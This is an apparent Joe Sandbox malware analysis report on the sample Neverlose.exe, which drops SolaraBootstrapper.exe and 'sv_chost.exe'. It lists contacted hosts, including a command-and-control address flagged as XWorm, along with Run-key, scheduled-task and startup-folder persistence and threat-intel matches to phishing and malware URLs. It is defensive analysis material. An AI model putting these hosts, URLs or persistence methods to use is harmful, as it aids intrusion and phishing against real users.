https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/trending | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com | SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.1705141692.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1819250516.000001B380229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1933016695.0000024330789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2103914349.000002DC624E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/solutions/industries/healthcare | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/github-elements-221b0e7d77a3.js | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://raw.githubusercontent.com | SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/enterprise/advanced-security | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.enigmaprotector.com/ | Neverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false
                  • Avira URL Cloud: safe
                  unknown
                  https://api.github.com/_private/browser/errorsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/features/discussionsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/topicsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-b0SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/enterprise/startupsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.comSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://partner.github.comSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/fluidicon.pngSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/favicons/favicon.pngSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.enigmaprotector.com/openUNeverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.mic)powershell.exe, 0000000D.00000002.2060250567.0000024348C25000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/light_tritanopia-fe4137b54b26.cssSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/notifications-global-3ddac678adaf.jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-typeSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://github.comSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/features/actionsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/dark-6b1e37da2254.cssSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/environment-4a62f2832289.jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/error-add24e2c1056.cssSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_anchored-positSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://github.com/features/copilotSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_moduleSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/dark_high_contrast-f4daad25d8cf.cssSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.micft.cMicRosofpowershell.exe, 0000000D.00000002.2060250567.0000024348BC5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/light-efd2f2257c96.cssSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_mSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/behaviors-3b4c83250375.jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/dark_tritanopia-1911f0cf0db4.cssSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.githubassets.com/assets/sessions-f096195f32d8.jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.199.109.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
147.185.221.22 | 22.ip.gl.ply.gg | United States | 12087 | SALSGIVERUS | true
140.82.121.4 | github.com | United States | 36459 | GITHUBUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1498483
Start date and time: 2024-08-24 21:54:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Neverlose.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@29/31@4/3
EGA Information:
• Successful, ratio: 23.1%
HCA Information:
• Successful, ratio: 71%
• Number of executed functions: 210
• Number of non-executed functions: 14
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Solara.exe, PID 7664 because it is empty
• Execution Graph export aborted for target Solara.exe, PID 7980 because it is empty
• Execution Graph export aborted for target SolaraBootstrapper.exe, PID 7200 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 4312 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7388 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7832 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8064 because it is empty
• Execution Graph export aborted for target sv_chost.exe, PID 7460 because it is empty
• Execution Graph export aborted for target sv_chost.exe, PID 7624 because it is empty
• Execution Graph export aborted for target sv_chost.exe, PID 7780 because it is empty
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
15:54:58 | API Interceptor | 82x Sleep call for process: powershell.exe modified
15:55:04 | API Interceptor | 16x Sleep call for process: SolaraBootstrapper.exe modified
15:56:25 | API Interceptor | 26x Sleep call for process: Solara.exe modified
20:55:06 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Solara C:\Users\user\AppData\Local\Temp\Solara.exe
20:55:14 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Solara C:\Users\user\AppData\Local\Temp\Solara.exe
20:56:27 | Task Scheduler | Run new task: sv_chost path: C:\Users\user\AppData\Roaming\sv_chost.exe
20:56:29 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sv_chost C:\Users\user\AppData\Roaming\sv_chost.exe
20:56:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sv_chost C:\Users\user\AppData\Roaming\sv_chost.exe
20:56:45 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sv_chost.lnk
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
185.199.109.133 | Electronic_Receipt_ATT0001.htm | malicious | HTMLPhisher |
185.199.109.133 | https://app.supercast.com/ahoy/messages/NuCwMXL7H9TYxRcbnPV2HNBC27R3XTJ7/click?signature=a81c8ff09c7aec0f320b61cbf7dd42e1a041100b&url=https://nursematte.com/asdbhewjcjfnjernfreddbecje/cloudflare-antibot#Kirsten.stevens+sueryder.org | malicious | HTMLPhisher |
185.199.109.133 | https://email.kmotortraiesde.com/ | malicious | Unknown |
185.199.109.133 | FlashUpdates.js | malicious | Unknown |
185.199.109.133 | http://dineshramgovindaraj.github.io/netflix | malicious | Unknown |
185.199.109.133 | https://q68o.giantrype.com/8BSXIBCv/ | malicious | Tycoon2FA |
185.199.109.133 | https://q68o.giantrype.com/8BSXIBCv/ | malicious | HTMLPhisher, Tycoon2FA |
185.199.109.133 | l6UA0MG4eo.exe | malicious | Unknown |
185.199.109.133 | V58VVR64wc.exe | malicious | Unknown |
185.199.109.133 | Lhz7Qbbaap.exe | malicious | Unknown |
147.185.221.22 | Solara.exe | malicious | XWorm |
147.185.221.22 | XClient.exe | malicious | XWorm |
147.185.221.22 | dsjjzgRwZe.exe | malicious | Njrat |
147.185.221.22 | 22.08.2024.exe | malicious | Xmrig |
147.185.221.22 | SolaraBootstrapper.exe | malicious | XWorm |
140.82.121.4 | RfORrHIRNe.doc | malicious | Unknown | github.com/ssbb36/stv/raw/main/5.mp3
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | N8LgG4xO0F.exe | malicious | DCRat, PureLog Stealer, zgRAT | 185.199.111.133
raw.githubusercontent.com | SecuriteInfo.com.Win64.Evo-gen.11830.19095.exe | malicious | Python Stealer, Monster Stealer | 185.199.108.133
raw.githubusercontent.com | FlashUpdates.js | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | 1U34vTVJ97.pdf | malicious | Unknown | 185.199.110.133
raw.githubusercontent.com | Ld0f3NDosJ.exe | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | OD8uS0ksdv.exe | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | OD8uS0ksdv.exe | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | Y1e7n1NMkI.exe | malicious | Coinhive | 185.199.110.133
raw.githubusercontent.com | lEzFKwZJRA.exe | malicious | Unknown | 185.199.110.133
raw.githubusercontent.com | PSZIOD9wM7.exe | malicious | LummaC, Go Injector | 185.199.110.133
github.com | Electronic_Receipt_ATT0001.htm | malicious | HTMLPhisher | 140.82.121.3
github.com | https://app.supercast.com/ahoy/messages/NuCwMXL7H9TYxRcbnPV2HNBC27R3XTJ7/click?signature=a81c8ff09c7aec0f320b61cbf7dd42e1a041100b&url=https://nursematte.com/asdbhewjcjfnjernfreddbecje/cloudflare-antibot#Kirsten.stevens+sueryder.org | malicious | HTMLPhisher | 140.82.121.3
github.com | 5c683657-3d2b-5cd5-b372-9be474a3f97e.eml | malicious | Unknown | 140.82.112.3
github.com | https://github.com/rakeshcorp/sandbox-samples.git | malicious | Unknown | 140.82.121.4
22.ip.gl.ply.gg | Solara.exe | malicious | XWorm | 147.185.221.22
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
FASTLYUS | file.exe | malicious | Python Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader | 185.199.111.133
FASTLYUS | https://www.wita.org/wp-login.php?action=rp&key=WIXXf8mMVxmBCgiJjzdZ&login=lfair%40USChamber.com | malicious | Unknown | 151.101.195.9
FASTLYUS | N8LgG4xO0F.exe | malicious | DCRat, PureLog Stealer, zgRAT | 185.199.111.133
FASTLYUS | SecuriteInfo.com.Win64.Evo-gen.11830.19095.exe | malicious | Python Stealer, Monster Stealer | 185.199.108.133
FASTLYUS | http://janecreativetileimp.wordpress.com/ | malicious | Unknown | 151.101.193.74
FASTLYUS | https://view.officecloudenterprise.com/jwlswke | malicious | Unknown | 151.101.66.137
FASTLYUS | https://new-update-108047.weeblysite.com/ | malicious | Unknown | 151.101.129.46
FASTLYUS | https://att-customer-service-109909.weeblysite.com/ | malicious | Unknown | 151.101.129.46
FASTLYUS | https://7667lghjgfmank85387sg387sfyruk53k538gfm.weeblysite.com/ | malicious | Unknown | 151.101.129.46
FASTLYUS | https://cathymanns101.wixsite.com/my-site-1 | malicious | HTMLPhisher | 199.232.188.157
GITHUBUS | file.exe | malicious | Python Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader | 140.82.121.3
GITHUBUS | https://google-check.github.io/home/ | malicious | Unknown | 140.82.112.18
GITHUBUS | Electronic_Receipt_ATT0001.htm | malicious | HTMLPhisher | 140.82.121.3
GITHUBUS | https://app.supercast.com/ahoy/messages/NuCwMXL7H9TYxRcbnPV2HNBC27R3XTJ7/click?signature=a81c8ff09c7aec0f320b61cbf7dd42e1a041100b&url=https://nursematte.com/asdbhewjcjfnjernfreddbecje/cloudflare-antibot#Kirsten.stevens+sueryder.org | malicious | HTMLPhisher | 140.82.121.3
GITHUBUS | 5c683657-3d2b-5cd5-b372-9be474a3f97e.eml | malicious | Unknown | 140.82.112.3
GITHUBUS | SecuriteInfo.com.Trojan.Siggen21.45671.28064.9687.exe | malicious | Unknown | 140.82.112.22
GITHUBUS | SecuriteInfo.com.Trojan.Siggen21.45671.28064.9687.exe | malicious | Unknown | 140.82.112.21
GITHUBUS | https://email.kmotortraiesde.com/ | malicious | Unknown | 140.82.121.6
GITHUBUS | https://anurenjm.github.io/NetflixClone | malicious | HTMLPhisher | 140.82.114.18
GITHUBUS | 1U34vTVJ97.pdf | malicious | Unknown | 140.82.121.6
SALSGIVERUS | Solara.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | XClient.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | dsjjzgRwZe.exe | malicious | Njrat | 147.185.221.22
SALSGIVERUS | 22.08.2024.exe | malicious | Xmrig | 147.185.221.19
SALSGIVERUS | Scan0030930930-pdf.js | malicious | XWorm | 147.185.221.21
SALSGIVERUS | 7shCdgBtEW.exe | malicious | Nanocore | 147.185.221.19
SALSGIVERUS | testt.exe | malicious | AsyncRAT, VenomRAT | 147.185.221.225
                                                SolaraBootstrapper.exeGet hashmaliciousXWormBrowse
                                                • 147.185.221.22
                                                iZ5oERbgGB.exeGet hashmaliciousNjratBrowse
                                                • 147.185.221.20
                                                file.exeGet hashmaliciousXWormBrowse
                                                • 147.185.221.20
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
  OnlineCrack_IDM.hta | malicious | Unknown | 185.199.109.133, 140.82.121.4
  file.exe | malicious | Amadey, Stealc, Vidar | 185.199.109.133, 140.82.121.4
  oBHZZU8EYd.exe | malicious | Blank Grabber, DCRat, PureLog Stealer, Umbral Stealer, zgRAT | 185.199.109.133, 140.82.121.4
  pxkGBmsm1Y.exe | malicious | DCRat | 185.199.109.133, 140.82.121.4
  https://www.wita.org/wp-login.php?action=rp&key=WIXXf8mMVxmBCgiJjzdZ&login=lfair%40USChamber.com | malicious | Unknown | 185.199.109.133, 140.82.121.4
  file.exe | malicious | PureLog Stealer, RedLine, zgRAT | 185.199.109.133, 140.82.121.4
  Order number HMFZ0772 [Order].exe | malicious | Snake Keylogger, VIP Keylogger | 185.199.109.133, 140.82.121.4
  http://329e60-b9.myshopify.com/_t/c/A1020004-17EE30B00427829D-68C1B5C3/ | malicious | Unknown | 185.199.109.133, 140.82.121.4
  http://y8oj.tonetrau.com | malicious | Unknown | 185.199.109.133, 140.82.121.4
